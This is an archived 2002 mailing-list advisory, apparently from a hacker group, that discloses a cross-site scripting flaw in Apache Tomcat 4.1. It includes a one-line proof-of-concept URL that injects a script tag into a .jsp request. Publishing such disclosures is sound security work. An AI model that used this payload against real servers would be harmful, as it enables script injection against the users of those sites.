Apache Tomcat 4.1 Cross-Site Scripting Vulnerability

• Previous message: http-equivat_private: "killer k00kie [was Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0]"
• Next in thread: Chip McClure: "Re: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability"
• Reply: Chip McClure: "Re: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

***** This writing is part of Malloc() Hackers & Malloc() Security *****
                            http://www.malloc.tk
                       http://www.superw00t.com
*******************************************************************************

Title: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability
~~~
                 Author: Skinnay of Malloc()
                 ~~~~~

Contact: "Skinnay" - (skinnayat_private)
~~~~~~

No modification of the contents of this file should be made
without direct consent of the author or of Malloc() hackers or
Malloc() Security.
************************************************************************



Apache Tomcat is a Webserver/servlet engine available for multiple *nix
platforms and Windows platforms.


There exist a cross-site scripting vulnerability in Apache Tomcat
that may allow people to craft links to vulnerable webservers
and execute malicious instructions.


Exploitation:

Tested on Tomcat 4.1 / Linux

http://example.com:8080/666%0a%0a>alert("asdf");</script>666.jsp



Found by Skinnay of Malloc().. word.. :P

• Next message: Chip McClure: "Re: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability"
• Previous message: http-equivat_private: "killer k00kie [was Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0]"
• Next in thread: Chip McClure: "Re: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability"
• Reply: Chip McClure: "Re: Apache Tomcat 4.1 Cross-Site Scripting Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 21 2002 - 15:59:15 PDT